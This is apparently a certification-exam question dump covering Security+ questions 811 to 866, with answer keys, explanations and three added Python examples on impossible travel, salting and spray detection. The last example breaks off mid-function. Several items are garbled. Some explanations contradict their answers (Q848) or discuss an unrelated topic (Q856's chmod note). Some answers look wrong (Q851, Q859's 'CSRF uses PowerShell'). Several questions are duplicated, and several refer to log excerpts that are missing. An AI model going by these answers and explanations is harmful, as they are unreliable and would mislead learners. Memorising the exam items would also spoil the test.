and information. The two terms are often used interchangeably in the industry, although the name SSL is
still widely used.
QUESTION 811
Which of the following is the FIRST environment in which proper, secure coding should be
practiced?
A. Stage
B. Development
C. Production
D. Test
Answer: B
Explanation:
The developer has to start writing secure code from the very beginning, in development. The code is then
tested, staged, and finally moved to production.
QUESTION 812
A company is under investigation for possible fraud. As part of the investigation, the authorities
need to review all emails and ensure data is not deleted.
Which of the following should the company implement to assist in the investigation?
A. Legal hold
B. Chain of custody
C. Data loss prevention
D. Content filter
Answer: A
Explanation:
Once an organization is aware that it needs to preserve evidence for a court case, it must do so.
The mechanism is fairly simple as well: once you realize your organization needs to preserve
evidence, you must use a legal hold, or litigation hold, which is the process by which you properly
preserve any and all digital evidence related to a potential case.
QUESTION 813
The new Chief Information Security Officer at a company has asked the security team to
implement stronger user account policies. The new policies require:
- Users to choose a password unique to their last ten passwords
- Users to not log in from certain high risk countries
Which of the following should the security team implement? (Choose two.)
A. Password complexity
B. Password history
C. Geolocation
D. Geofencing
E. Geotagging
F. Password reuse
Answer: BD
Explanation:
Password history - The number of unique passwords that must be used before a user can reuse an
old password.
Geolocation is the technology used to perform geofencing. To actually restrict logins from
certain locations, you would use geofencing.
QUESTION 814
Which of the following secure application development concepts aims to block verbose error
messages from being shown in a user's interface?
A. OWASP
B. Obfuscation/camouflage
C. Test environment
D. Prevention of information exposure
Answer: D
Explanation:
Prevention of information exposure. This concept focuses on ensuring that sensitive information,
such as stack traces, debug output, and detailed error messages, is not disclosed to
unauthorized parties through the user interface.
QUESTION 815
Which of the following is the MOST likely reason for securing an air gapped laboratory HVAC
system?
A. To avoid data leakage
B. To protect surveillance logs
C. To ensure availability
D. To facilitate third party access
Answer: A
QUESTION 816
An untrusted SSL certificate was discovered during the most recent vulnerability scan. A security
analyst determines the certificate is signed properly and is a valid wildcard. This same certificate
is installed on the other company servers without issue. Which of the following is the MOST likely
reason for this finding?
A. The required intermediate certificate is not loaded as part of the certificate chain.
B. The certificate is on the CRL and is no longer valid.
C. The corporate CA has expired on every server, causing the certificate to fail verification.
D. The scanner is incorrectly configured to not trust this certificate when detected on the server.
Answer: A
Explanation:
Most of the time the scanning engine will require a root CA certificate (if needed) to get more
accurate results from the scan. If a root CA certificate is not provided and an SSL
certificate is located on a server, the result will be that it is "untrusted", so we have to load the root
certificate and the warning will disappear.
QUESTION 817
Which of the following supplies non-repudiation during a forensics investigation?
A. Dumping volatile memory contents first
B. Duplicating a drive with dd
C. Using a SHA 2 signature of a drive image
D. Logging everyone in contact with evidence
E. Encrypting sensitive data
Answer: C
Explanation:
Nonrepudiation is specifically about proof that someone has done something on the system.
Taking a hash of the original disk is proof that the image represents the state of the data when the
investigation began. It is not a signature in the sense of an encryption certificate, but it is a method
of ensuring that the data on the drive represents the user's changes rather than those of the
investigator or someone else after the fact. Chain of custody does not apply because
nonrepudiation here is about the data itself.
QUESTION 818
Which of the following uses SAML for authentication?
A. TOTP
B. Federation
C. Kerberos
D. HOTP
Answer: B
Explanation:
Federation, or identity federation, defines policies, protocols, and practices to manage identities
across systems and organizations. Federation’s ultimate goal is to allow users to seamlessly
access data or systems across domains. Federation is enabled through the use of industry
standards such as Security Assertion Markup Language (SAML).
QUESTION 819
Which of the following processes will eliminate data using a method that will allow the storage
device to be reused after the process is complete?
A. Pulverizing
B. Overwriting
C. Shredding
D. Degaussing
Answer: B
QUESTION 820
A company discovered that terabytes of data have been exfiltrated over the past year after an
employee clicked on an email link. The threat continued to evolve and remain undetected until a
security analyst noticed an abnormal amount of external connections when the employee was not
working. Which of the following is the MOST likely threat actor?
A. Shadow IT
B. Script kiddies
C. APT
D. Insider threat
Answer: C
Explanation:
An APT attack is characterized by using toolkits to achieve a presence on a target network and
then, instead of just moving to steal information, focusing on the long game by maintaining a
persistent presence on the target network. The tactics, tools, and procedures of APTs are
focused on maintaining administrative access to the target network and avoiding detection. Then,
over the long haul, the attacker can remove intellectual property and more from the organization,
typically undetected.
QUESTION 821
An organization is planning to roll out a new mobile device policy and issue each employee a new
laptop. These laptops would access the users' corporate operating system remotely and allow
them to use the laptops for purposes outside of their job roles. Which of the following deployment
models is being utilized?
A. MDM and application management
B. BYOD and containers
C. COPE and VDI
D. CYOD and VMs
Answer: C
Explanation:
Bring your own device (BYOD) - the mobile device is owned by the employee. The mobile will
have to meet whatever profile is required by the company (in terms of OS version and
functionality) and the employee will have to agree on the installation of corporate apps and to
some level of oversight and auditing. This model is usually the most popular with employees but
poses the most difficulties for security and network managers.
Corporate owned, business only (COBO) - the device is the property of the company and may
only be used for company business.
Corporate owned, personally-enabled (COPE) - the device is chosen and supplied by the
company and remains its property. The employee may use it to access personal email and social
media accounts and for personal web browsing (subject to whatever acceptable use policies are
in force).
Choose your own device (CYOD) - much the same as COPE but the employee is given a choice
of device from a list.
QUESTION 822
A Chief Security Officer is looking for a solution that can provide increased scalability and
flexibility for back-end infrastructure, allowing it to be updated and modified without disruption to
services. The security architect would like the solution selected to reduce the back-end server
resources and has highlighted that session persistence is not important for the applications
running on the back-end servers. Which of the following would BEST meet the requirements?
A. Reverse proxy
B. Automated patch management
C. Snapshots
D. NIC teaming
Answer: A
Explanation:
In computer networks, a reverse proxy is the application that sits in front of back-end applications
and forwards client requests to those applications. Reverse proxies help increase scalability,
performance, resilience and security.
QUESTION 823
A recent phishing campaign resulted in several compromised user accounts. The security
incident response team has been tasked with reducing the manual labor of filtering through all the
phishing emails as they arrive and blocking the sender's email address, along with other time
consuming mitigation actions. Which of the following can be configured to streamline those
tasks?
A. SOAR playbook
B. MOM policy
C. Firewall rules
D. URL filter
E. SIEM data collection
Answer: A
Explanation:
SOAR playbooks are used to automate key functions of a SOC based on processes documented
in the incident response playbooks.
QUESTION 824
Which of the following is a security best practice that ensures the integrity of aggregated log files
within a SIEM?
A. Set up hashing on the source log file servers that complies with local regulatory requirements.
B. Back up the aggregated log files at least two times a day or as stated by local regulatory
requirements.
C. Write protect the aggregated log files and move them to an isolated server with limited access.
D. Back up the source log files and archive them for at least six years or in accordance with local
regulatory requirements.
Answer: A
Explanation:
Log File Integrity Validation in AWS
This feature informs you of any modifications or deletions to CloudTrail logs. By using SHA-256
for hashing and SHA-256 with RSA for digital signing, AWS claims, “This makes it
computationally infeasible to modify, delete, or forge CloudTrail log files without detection.”
QUESTION 825
A company recently experienced an inside attack using a corporate machine that resulted in data
compromise. Analysis indicated an unauthorized change to the software circumvented
technological protection measures. The analyst was tasked with determining the best method to
ensure the integrity of the systems remains intact and local and remote boot attestation can take
place. Which of the following would provide the BEST solution?
A. HIPS
B. FIM
C. TPM
D. DLP
Answer: C
Explanation:
In this question, an attack has already occurred so preventative measures such as HIPS, FIM, or
DLP would not be helpful. Also, the analyst wants to check the integrity of the system, and boot
attestation can take place. TPM chips have mechanisms to prevent system tampering and boot
attestation can be done with TPM based hardware to verify the state of the firmware, bootloader,
etc. TPM is the best option here.
HIPS (Host Intrusion Prevention System) - An installed software package that monitors a
single host for suspicious activity by analyzing events occurring within that host. It aims to stop
malware by monitoring the behavior of code.
FIM (File Integrity Monitoring) - Technology that monitors and detects file changes that could be
indicative of a cyberattack. FIM specifically involves examining files to see if and when they
change, how they change, who changed them, and what can be done to restore those files if
those modifications are unauthorized.
DLP (Data Loss Prevention) - A set of tools and processes used to ensure that sensitive data is
not lost, misused, or accessed by unauthorized users.
QUESTION 826
A SOC operator is receiving continuous alerts from multiple Linux systems indicating that
unsuccessful SSH attempts to a functional user ID have been attempted on each one of them in a
short period of time. Which of the following BEST explains this behavior?
A. Rainbow table attack
B. Password spraying
C. Logic bomb
D. Malware bot
Answer: B
Explanation:
Password spraying is a variant of what is known as a brute force attack. In a traditional brute
force attack, the perpetrator attempts to gain unauthorized access to a single account by
guessing the password repeatedly in a very short period of time. Password spraying instead tries
a single password against many accounts or systems, which is why the failed attempts against
the same user ID appear across multiple hosts within a short window.
QUESTION 827
Which of the following social engineering attacks BEST describes an email that is primarily
intended to mislead recipients into forwarding the email to others?
A. Hoaxing
B. Pharming
C. Watering-hole
D. Phishing
Answer: A
Explanation:
A virus hoax is a false warning about a computer virus. Typically, the warning arrives in an email
note or is distributed through a note in a company's internal network. These notes are usually
forwarded using distribution lists, and they will typically suggest that the recipient forward the note
to other distribution lists.
QUESTION 828
Which of the following can work as an authentication method and as an alerting mechanism for
unauthorized access attempts?
A. Smart card
B. Push notifications
C. Attestation service
D. HMAC-based one-time password
Answer: B
Explanation:
It is like the Google sign-in prompt: as an MFA factor, push notifications let you approve an
authentication and also alert you when someone is trying to log in to your account.
QUESTION 829
Which of the following is a risk that is specifically associated with hosting applications in the
public cloud?
A. Unsecured root accounts
B. Zero-day
C. Shared tenancy
D. Insider threat
Answer: C
Explanation:
In a multi-tenant environment, such as the cloud, a “container” vulnerability can allow an attacker
to compromise containers of other tenants on the same host. Flaws in chip design can also result
in the compromise of tenant information in the cloud through side-channel attacks.
QUESTION 830
Which of the following is an effective tool to stop or prevent the exfiltration of data from a
network?
A. DLP
B. NIDS
C. TPM
D. FDE
Answer: A
Explanation:
Data loss prevention (DLP) makes sure that users do not send sensitive or critical information
outside the corporate network.
QUESTION 831
During a recent security incident at a multinational corporation a security analyst found the
following logs for an account called user:
Which of the following account policies would BEST prevent attackers from logging in as user?
A. Impossible travel time
B. Geofencing
C. Time based logins
D. Geolocation
Answer: A
Explanation:
Impossible Travel is a calculation made by comparing a user's last known location to their current
location, then assessing whether the trip is likely or even possible in the time that elapsed
between the two measurements.
It can calculate the time it would take to travel from New York to Los Angeles and see it would be
impossible to accomplish this within a minute.
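Worked illustration of the impossible-travel calculation described above (added example, not part of the original dump): two constructed logins for the account, geolocated to New York and Los Angeles a minute apart, are compared against an assumed maximum plausible speed. The city coordinates, timestamps and the 900 km/h threshold are all constructed assumptions.

```python
import math
from datetime import datetime, timezone

# Constructed login records for the account "user" (not the page's log data):
# (timestamp, latitude, longitude). The first two approximate New York and
# Los Angeles one minute apart, the case the explanation describes.
SAMPLE_LOGINS = [
    (datetime(2023, 3, 1, 12, 0, 0, tzinfo=timezone.utc), 40.7128, -74.0060),    # New York
    (datetime(2023, 3, 1, 12, 1, 0, tzinfo=timezone.utc), 34.0522, -118.2437),   # Los Angeles
    (datetime(2023, 3, 1, 18, 30, 0, tzinfo=timezone.utc), 37.7749, -122.4194),  # San Francisco
]

# Assumed policy threshold: faster than an airliner (about 900 km/h) is treated
# as impossible. Real products tune this and allow for geolocation error.
MAX_PLAUSIBLE_KMH = 900.0
EARTH_RADIUS_KM = 6371.0

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two latitude/longitude points."""
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = phi2 - phi1
    dlambda = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlambda / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))

def required_speed_kmh(prev, curr):
    """Speed the user would have needed to travel between two consecutive logins.
    Returns math.inf when the locations differ but no time elapsed (identical or
    out-of-order timestamps), so such pairs are still flagged instead of dividing by zero."""
    (t1, lat1, lon1), (t2, lat2, lon2) = prev, curr
    distance = haversine_km(lat1, lon1, lat2, lon2)
    hours = (t2 - t1).total_seconds() / 3600.0
    if hours <= 0:
        return math.inf if distance > 0 else 0.0
    return distance / hours

def find_impossible_travel(logins, max_kmh=MAX_PLAUSIBLE_KMH):
    """Compare each login with the previous one in time order and return
    (previous, current, speed_kmh) for every pair exceeding max_kmh. An account
    policy built on this would block or challenge the second login."""
    ordered = sorted(logins, key=lambda record: record[0])
    flagged = []
    for prev, curr in zip(ordered, ordered[1:]):
        speed = required_speed_kmh(prev, curr)
        if speed > max_kmh:
            flagged.append((prev, curr, speed))
    return flagged

if __name__ == "__main__":
    for prev, curr, speed in find_impossible_travel(SAMPLE_LOGINS):
        distance = haversine_km(prev[1], prev[2], curr[1], curr[2])
        minutes = (curr[0] - prev[0]).total_seconds() / 60
        print(f"impossible travel: {prev[0]:%H:%M} -> {curr[0]:%H:%M}, "
              f"{distance:.0f} km in {minutes:.0f} min ({speed:.0f} km/h)")
```

The New York to Los Angeles pair is flagged (roughly 3,900 km in one minute); the later Los Angeles to San Francisco login is not, because several hours elapsed.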
QUESTION 832
An attacker has successfully exfiltrated several non-salted password hashes from an online
system.
Given the logs below:
Which of the following BEST describes the type of password attack the attacker is performing?
A. Dictionary
B. Pass the hash
C. Brute force
D. Password spraying
Answer: A
QUESTION 833
A security analyst wants to reference a standard to develop a risk management program. Which
of the following is the BEST source for the analyst to use?
A. SSAE SOC 2
B. ISO 31000
C. NIST CSF
D. GDPR
Answer: B
Explanation:
The ISO 31000 Risk Management framework is an international standard from the International
Organization for Standardization that provides businesses with guidelines and principles for risk
management. Regulatory compliance initiatives are usually specific to a particular country and
applicable to businesses of a certain size or in specific industries. However, ISO 31000 is designed
to be used in organizations of any size. Its concepts work equally well in the public and the private
sector, in large or small businesses and nonprofit organizations.
QUESTION 834
Against the recommendation of the IT security analyst, a company set all user passwords on a
server as `P@55w0rD`. Upon review of the /etc/passwd file, an attacker found the following:
alice:a8df3b6c4fd75f0617431fd248f35191df8d237f
bob:2d250c5b2976b03d757f324ebd59340df96aa05e
chris:ea981ec3285421d014108089f3f3f997ce0f4150
Which of the following BEST explains why the encrypted passwords do not match?
A. Perfect forward secrecy
B. Key stretching
C. Salting
D. Hashing
Answer: C
Explanation:
Salting refers to adding random data to the input of a hash function so that the output is unique
even when two users choose the same password. The set password in this case is already
hashed; salting is the next step in securing it, i.e. adding a random per-user value before hashing
so that identical passwords produce different stored hashes. Think of it as "salt bae" making it
just that much better.
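Added illustration of why the three entries differ (example code, not part of the original dump): the same password hashed without a salt gives one identical digest for every user, while a random per-user salt gives three different digests that can still each be verified. The salt format and length are assumptions, and the hashes shown on the page are not reproduced.

```python
import hashlib
import secrets

# Constructed scenario (not the page's /etc/passwd data): three accounts were all
# given the same password. The digests below are recomputed here, not copied.
SHARED_PASSWORD = "P@55w0rD"
USERS = ["alice", "bob", "chris"]

def hash_unsalted(password):
    """SHA-1 of the bare password: every user with this password stores the
    same 40-hex-character digest, so one cracked hash unlocks all of them."""
    return hashlib.sha1(password.encode()).hexdigest()

def hash_salted(password, salt):
    """SHA-1 over salt || password. Because the salt is random per user, the
    same password yields a different digest for each account. The record is
    stored as 'salt$digest' so the salt is available for later verification."""
    digest = hashlib.sha1(salt.encode() + password.encode()).hexdigest()
    return f"{salt}${digest}"

def hash_stretched(password, salt, iterations=600_000):
    """Salting plus key stretching (option B on the page): PBKDF2-HMAC-SHA256
    makes each guess expensive. This is the form a production store should use."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return f"{salt}${iterations}${digest.hex()}"

def new_salt(nbytes=8):
    """Fresh random salt, hex-encoded (assumed 8 bytes; 16 is typical)."""
    return secrets.token_hex(nbytes)

def verify_salted(password, stored):
    """Split out the stored salt, recompute, and compare in constant time."""
    salt, _, digest = stored.partition("$")
    candidate = hash_salted(password, salt).partition("$")[2]
    return secrets.compare_digest(candidate, digest)

def build_store(users, password):
    """Simulate the administrator setting the same password on every account."""
    return {user: hash_salted(password, new_salt()) for user in users}

def all_identical(values):
    return len(set(values)) == 1

if __name__ == "__main__":
    unsalted = {user: hash_unsalted(SHARED_PASSWORD) for user in USERS}
    salted = build_store(USERS, SHARED_PASSWORD)
    print("unsalted digests identical:", all_identical(unsalted.values()))
    print("salted digests identical:  ", all_identical(salted.values()))
    for user, record in salted.items():
        print(f"{user}:{record}  verifies={verify_salted(SHARED_PASSWORD, record)}")
```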
QUESTION 835
The Chief Information Security Officer is concerned about employees using personal email rather
than company email to communicate with clients and sending sensitive business information and
PII. Which of the following would be the BEST solution to install on the employees' workstations
to prevent information from leaving the company's network?
A. HIPS
B. DLP
C. HIDS
D. EDR
Answer: B
Explanation:
DLP enables businesses to detect data loss, as well as prevent the illicit transfer of data outside
the organization and the unwanted destruction of sensitive or personally identifiable data (PII).
QUESTION 836
On the way into a secure building, an unknown individual strikes up a conversation with an
employee. The employee scans the required badge at the door while the unknown individual
holds the door open, seemingly out of courtesy, for the employee. Which of the following social
engineering techniques is being utilized?
A. Shoulder surfing
B. Watering-hole attack
C. Tailgating
D. Impersonation
Answer: C
Explanation:
Tailgating is following someone who has access to a secure area into that area without having
access yourself.
Shoulder surfing is looking over the shoulder of someone who has access to information while
they have it open to view, when you should not otherwise have access to that information. This
scenario is clearly tailgating rather than shoulder surfing.
QUESTION 837
Two hospitals merged into a single organization. The privacy officer requested a review of all
records to ensure encryption was used during record storage, in compliance with regulations.
During the review, the officer discovered that medical diagnosis codes and patient names were
left unsecured. Which of the following types of data does this combination BEST represent?
A. Personal health information
B. Personally identifiable information
C. Tokenized data
D. Proprietary data
Answer: A
Explanation:
Protected health information (PHI) is a subset of PII, but it specifically refers to health information
shared with HIPAA covered entities. Medical records, lab reports, and hospital bills are PHI, along
with any information relating to an individual's past, present, or future physical or mental health.
QUESTION 838
A security analyst has been tasked with ensuring all programs that are deployed into the
enterprise have been assessed in a runtime environment. Any critical issues found in the program
must be sent back to the developer for verification and remediation. Which of the following BEST
describes the type of assessment taking place?
A. Input validation
B. Dynamic code analysis
C. Fuzzing
D. Manual code review
Answer: B
Explanation:
Dynamic analysis means that the application is tested under "real world" conditions using a
staging environment.
QUESTION 839
A security analyst is reviewing the vulnerability scan report for a web server following an incident.
The vulnerability that was used to exploit the server is present in historical vulnerability scan
reports, and a patch is available for the vulnerability. Which of the following is the MOST likely
cause?
A. Security patches were uninstalled due to user impact.
B. An adversary altered the vulnerability scan reports.
C. A zero-day vulnerability was used to exploit the web server.
D. The scan reported a false negative for the vulnerability.
Answer: A
Explanation:
It is not a zero day because a patch has been released for that vulnerability, not because of the
"if it were a zero-day vulnerability, it would not show up in a vulnerability scan" argument. A
company using an app can spot a vulnerability, or the vendor that developed the app may be well
aware of it, but if no patch has been released for it, it still remains a zero-day vulnerability.
QUESTION 840
Which of the following BEST describes the process of documenting who has access to evidence?
A. Order of volatility
B. Chain of custody
C. Non-repudiation
D. Admissibility
Answer: B
Explanation:
A chain of custody is a chronological paper trail documenting when, how, and by whom individual
items of physical or electronic evidence - such as cell phone logs - were collected, handled,
analyzed, or otherwise controlled during an investigation.
QUESTION 841
A systems engineer wants to leverage a cloud-based architecture with low latency between
network-connected devices that also reduces the bandwidth that is required by performing
analytics directly on the endpoints. Which of the following would BEST meet the requirements?
(Choose two.)
A. Private cloud
B. SaaS
C. Hybrid cloud
D. IaaS
E. DRaaS
F. Fog computing
Answer: CF
Explanation:
Many people use the terms fog computing and edge computing interchangeably because both
involve bringing intelligence and processing closer to where the data is created.
Fog computing is a distributed form of cloud computing, in which the workload is performed on a
distributed, decentralized architecture. Originally developed by Cisco, fog computing moves some
of the work into the local space to manage latency issues, with the cloud being less synchronous.
In this form, it is similar to edge computing.
QUESTION 842
Which of the following is a policy that provides a greater depth and breadth of knowledge across
an organization?
A. Asset management policy
B. Separation of duties policy
C. Acceptable use policy
D. Job rotation policy
Answer: D
Explanation:
The question is about gaining knowledge across the organization ("gaining knowledge in every
department"); the only policy that achieves that is job rotation.
QUESTION 843
A company acquired several other small companies. The company that acquired the others is
transitioning network services to the cloud. The company wants to make sure that performance
and security remain intact. Which of the following BEST meets both requirements?
A. High availability
B. Application security
C. Segmentation
D. Integration and auditing
Answer: D
Explanation:
The integration of the appropriate level and quantity of security controls is a subject that is always
being audited. Are the controls appropriate? Are they placed and used correctly? Most
importantly, are they effective? These are standard IT audit elements in the enterprise. The
moving of computing resources to the cloud does not change the need or intent of audit functions.
QUESTION 844
A security engineer must deploy two wireless routers in an office suite. Other tenants in the office
building should not be able to connect to this wireless network.
Which of the following protocols should the engineer implement to ensure the STRONGEST
encryption?
A. WPS
B. WPA2
C. WAP
D. HTTPS
Answer: B
QUESTION 845
A company recently decided to allow its employees to use their personally owned devices for
tasks like checking email and messaging via mobile applications. The company would like to use
MDM, but employees are concerned about the loss of personal data. Which of the following
should the IT department implement to BEST protect the company against company data loss
while still addressing the employees’ concerns?
A. Enable the remote-wiping option in the MDM software in case the phone is stolen.
B. Configure the MDM software to enforce the use of PINs to access the phone.
C. Configure MDM for FDE without enabling the lock screen.
D. Perform a factory reset on the phone before installing the company's applications.
Answer: B
QUESTION 846
A penetration tester is brought on site to conduct a full attack simulation at a hospital. The
penetration tester notices a WAP that is hanging from the drop ceiling by its cabling and is
reachable. Which of the following recommendations would the penetration tester MOST likely
make given this observation?
A. Employ a general contractor to replace the drop-ceiling tiles.
B. Place the network cabling inside a secure conduit.
C. Secure the access point and cabling inside the drop ceiling.
D. Utilize only access points that have internal antennas.
Answer: C
QUESTION 847
A security engineer is concerned that the strategy for detection on endpoints is too heavily
dependent on previously defined attacks. The engineer would like a tool to monitor for changes to
key files and network traffic on the device.
Which of the following tools BEST addresses both detection and prevention?
A. NIDS
B. HIPS
C. AV
D. NGFW
Answer: B
Explanation:
A host-based intrusion prevention system (HIPS) is a system or a program employed to protect
critical computer systems containing crucial data against viruses and other Internet malware.
Starting from the network layer all the way up to the application layer, HIPS protects from known
and unknown malicious attacks.
QUESTION 848
An organization is repairing the damage after an incident. Which of the following controls is being
implemented?
A. Detective
B. Preventive
C. Corrective
D. Compensating
Answer: C
Explanation:
A compensating control, also called an alternative control, is a mechanism that is put in place to
satisfy the requirement for a security measure that is deemed too difficult or impractical to
implement at the present time.
QUESTION 849
An organization is tuning SIEM rules based on threat intelligence reports. Which of the
following phases of the incident response process does this scenario represent?
A. Lessons learned
B. Eradication
C. Recovery
D. Preparation
Answer: D
Explanation:
The preparation phase is when the organization is preparing for the attack. Tuning the SIEM is
just providing the latest threat information to the system for preparation.
Phases of the Incident Response Plan:
1. Preparation - Preparing for an attack and how to respond
2. Identification - Identifying the threat
3. Containment - Containing the threat
4. Eradication - Removing the threat
5. Recovery - Recovering affected systems
6. Lessons Learned - Evaluating the incident response, see where there can be improvements for
a future incident.
QUESTION 850
A security team suspects that the cause of recent power consumption overloads is the
unauthorized use of empty power outlets in the network rack.
Which of the following options will mitigate this issue without compromising the number of outlets
available?
A. Adding a new UPS dedicated to the rack
B. Installing a managed PDU
C. Using only a dual power supply unit
D. Increasing power generator capacity
Answer: B
Explanation:
Managed power distribution units supply power and provide remote control over individual
outlets (switching them on or off), which enables remote server restarts and monitoring of energy
consumption per outlet.
QUESTION 851
A company recently experienced a major breach. An investigation concludes that customer credit
card data was stolen and exfiltrated through a dedicated business partner connection to a vendor,
who is not held to the same security control standards.
Which of the following is the MOST likely source of the breach?
A. Side channel
B. Supply chain
C. Cryptographic downgrade
D. Malware
Answer: C
QUESTION 852
A systems engineer is building a new system for production. Which of the following is the FINAL
step to be performed prior to promoting to production?
A. Disable unneeded services.
B. Install the latest security patches.
C. Run a vulnerability scan.
D. Encrypt all disks.
Answer: C
QUESTION 853
The Chief Information Security Officer has directed the security and networking team to retire the
use of shared passwords on routers and switches.
Which of the following choices BEST meets the requirements?
A. SAML
B. TACACS+
C. Password vaults
D. OAuth
Answer: B
QUESTION 854
A store receives reports that shoppers' credit card information is being stolen. Upon further
analysis, those same shoppers also withdrew money from an ATM in that store. The attackers
are using the targeted shoppers' credit card information to make online purchases.
Which of the following attacks is the MOST probable cause?
A. Identity theft
B. RFID cloning
C. Shoulder surfing
D. Card skimming
Answer: D
QUESTION 855
Which of the following controls would be the MOST cost-effective and time-efficient to deter
intrusions at the perimeter of a restricted, remote military training area? (Choose two.)
A. Barricades
B. Thermal sensors
C. Drones
D. Signage
E. Motion sensors
F. Guards
G. Bollards
Answer: AE
QUESTION 856
A Chief Information Officer is concerned about employees using company-issued laptops to steal
data when accessing network shares. Which of the following should the company implement?
A. DLP
B. CASB
C. HIDS
D. EDR
E. UEFI
Answer: A
Explanation:
chmod removes the setuid permission, that is, it removes the S bit. setuid is the specific
permission, but it is removed with chmod.
https://www.cbtnuggets.com/blog/technology/system-admin/linux-file-permissions-understanding-setuid-setgid-and-the-sticky-bit
QUESTION 857
A Chief Information Officer is concerned about employees using company-issued laptops to steal
data when accessing network shares. Which of the following should the company implement?
A. DLP
B. CASB
C. HIDS
D. EDR
E. UEFI
Answer: A
QUESTION 858
A company's public-facing website, https://www.organization.com, has an IP address of
166.18.75.6. However, over the past hour the SOC has received reports of the site's homepage
displaying incorrect information. A quick nslookup search shows https://www.organization.com is
pointing to 151.191.122.115. Which of the following is occurring?
A. DoS attack
B. ARP poisoning
C. DNS spoofing
D. NXDOMAIN attack
Answer: C
QUESTION 859
A security analyst reviews web server logs and notices the following lines:
Which of the following vulnerabilities is the attacker trying to exploit?
A. Token reuse
B. SQLi
C. CSRF
D. XSS
Answer: C
Explanation:
Get command is PowerShell = CSRF uses PowerShell
XSS = JavaScript
QUESTION 860
A Chief Information Officer is concerned about employees using company-issued laptops to steal
data when accessing network shares. Which of the following should the company implement?
A. DLP
B. CASB
C. HIDS
D. EDR
E. UEFI
Answer: A
QUESTION 861
A junior security analyst is reviewing web server logs and identifies the following pattern in the log
file:
Which of the following types of attacks is being attempted and how can it be mitigated?
A. XSS, implement a SIEM
B. CSRF, implement an IPS
C. Directory traversal, implement a WAF
D. SQL injection, implement an IDS
Answer: C
QUESTION 862
Employees at a company are receiving unsolicited text messages on their corporate cell phones.
The unsolicited text messages contain a password reset link.
Which of the attacks is being used to target the company?
A. Phishing
B. Vishing
C. Smishing
D. Spam
Answer: C
Explanation:
Smishing is a type of phishing attack which begins with an attacker sending a text message to an
individual. The message contains social engineering tactics to convince the person to click on a
malicious link or send sensitive information to the attacker. Criminals use smishing attacks for
purposes like:
Learn login credentials to accounts via credential phishing
Discover private data like social security numbers
Send money to the attacker
Install malware on a phone
Establish trust before using other forms of contact like phone calls or emails
Attackers may pose as trusted sources like a government organization, a person you know, or
your bank. And messages often come with manufactured urgency and time-sensitive threats. This
can make it more difficult for a victim to notice a scam.
Phone numbers are easy to spoof with VoIP texting, where users can create a virtual number to
send and receive texts. If a certain phone number is flagged for spam, criminals can simply
recycle it and use a new one.
QUESTION 863
Which of the following involves the inclusion of code in the main codebase as soon as it is
written?
A. Continuous monitoring
B. Continuous deployment
C. Continuous validation
D. Continuous integration
Answer: D
Explanation:
Continuous integration is the practice of automating the integration of code changes from
multiple contributors into a single software project.
Continuous integration puts a great emphasis on test automation to check that the application
is not broken whenever new commits are integrated into the main branch.
QUESTION 864
An information security manager for an organization is completing a PCI DSS self-assessment for
the first time. Which of the following is the MOST likely reason for this type of assessment?
A. An international expansion project is currently underway.
B. Outside consultants utilize this tool to measure security maturity.
C. The organization is expecting to process credit card information.
D. A government regulator has requested this audit to be completed.
Answer: C
QUESTION 865
A security engineer is hardening existing solutions to reduce application vulnerabilities. Which of
the following solutions should the engineer implement FIRST? (Choose two.)
A. Auto-update
B. HTTP headers
C. Secure cookies
D. Third-party updates
E. Full disk encryption
F. Sandboxing
G. Hardware encryption
Answer: AC
Explanation:
Auto-update is a solution that automatically installs security patches and updates to applications.
This helps to ensure that applications are always up to date with the latest security patches,
which can help to reduce the risk of vulnerabilities being exploited.
Secure cookies are cookies that are encrypted and signed. This helps to protect the cookies from
being tampered with or stolen by attackers.
QUESTION 866
A security analyst reviews a company's authentication logs and notices multiple authentication
failures. The authentication failures are from different usernames that share the same source IP
address. Which of the password attacks is MOST likely happening?
A. Dictionary
B. Rainbow table
C. Spraying
D. Brute-force
Answer: C
Explanation:
In a password spraying attack, an attacker tries a short list of common passwords against a large
number of accounts, one or two attempts per account, rather than many attempts against a single
account. This keeps every account below its lockout threshold and is often more efficient than
brute-forcing accounts individually.
In this case, the failures come from many different usernames but a single source IP address,
which is the signature of spraying: one source, many accounts, few attempts each. A brute-force
attack would instead show many failures against the same username.
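As an added example (not part of the original question or of this dump), the following Python script applies that distinction to a constructed authentication log: it groups failures by source IP and labels a source as spraying when many distinct usernames fail inside a time window with only a couple of attempts each, and as brute force when one username accumulates many failures from the same source. The log lines, IP addresses and thresholds are invented for illustration and should be tuned to a real environment's baseline.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample authentication log (not taken from the question or any real system):
# timestamp, source IP, username, result.
SAMPLE_LOG = """\
2024-03-01T09:00:01 198.51.100.7 alice FAIL
2024-03-01T09:00:02 198.51.100.7 bob FAIL
2024-03-01T09:00:03 198.51.100.7 carol FAIL
2024-03-01T09:00:04 198.51.100.7 dave FAIL
2024-03-01T09:00:05 198.51.100.7 erin FAIL
2024-03-01T09:00:06 198.51.100.7 frank FAIL
2024-03-01T09:05:00 203.0.113.9 admin FAIL
2024-03-01T09:05:01 203.0.113.9 admin FAIL
2024-03-01T09:05:02 203.0.113.9 admin FAIL
2024-03-01T09:05:03 203.0.113.9 admin FAIL
2024-03-01T09:05:04 203.0.113.9 admin FAIL
2024-03-01T09:05:05 203.0.113.9 admin FAIL
2024-03-01T09:05:06 203.0.113.9 admin FAIL
2024-03-01T09:05:07 203.0.113.9 admin FAIL
2024-03-01T09:30:00 192.0.2.44 grace FAIL
2024-03-01T09:30:20 192.0.2.44 grace OK
"""


def parse_log(text):
    """Turn the constructed log into (timestamp, source, user, result) tuples."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, src, user, result = line.split()
            events.append((datetime.fromisoformat(ts), src, user, result))
    return events


def classify_sources(events, window=timedelta(minutes=10),
                     min_users=5, max_per_user=2, min_attempts=8):
    """Label each source IP as 'spraying', 'brute-force' or 'normal'.

    Spraying: many distinct usernames from one source inside the window, each
    tried only a couple of times (stays under account lockout thresholds).
    Brute-force: many failures against a single username from one source.
    The thresholds are illustrative assumptions; tune them to your own baseline.
    """
    failures = defaultdict(list)
    for ts, src, user, result in events:
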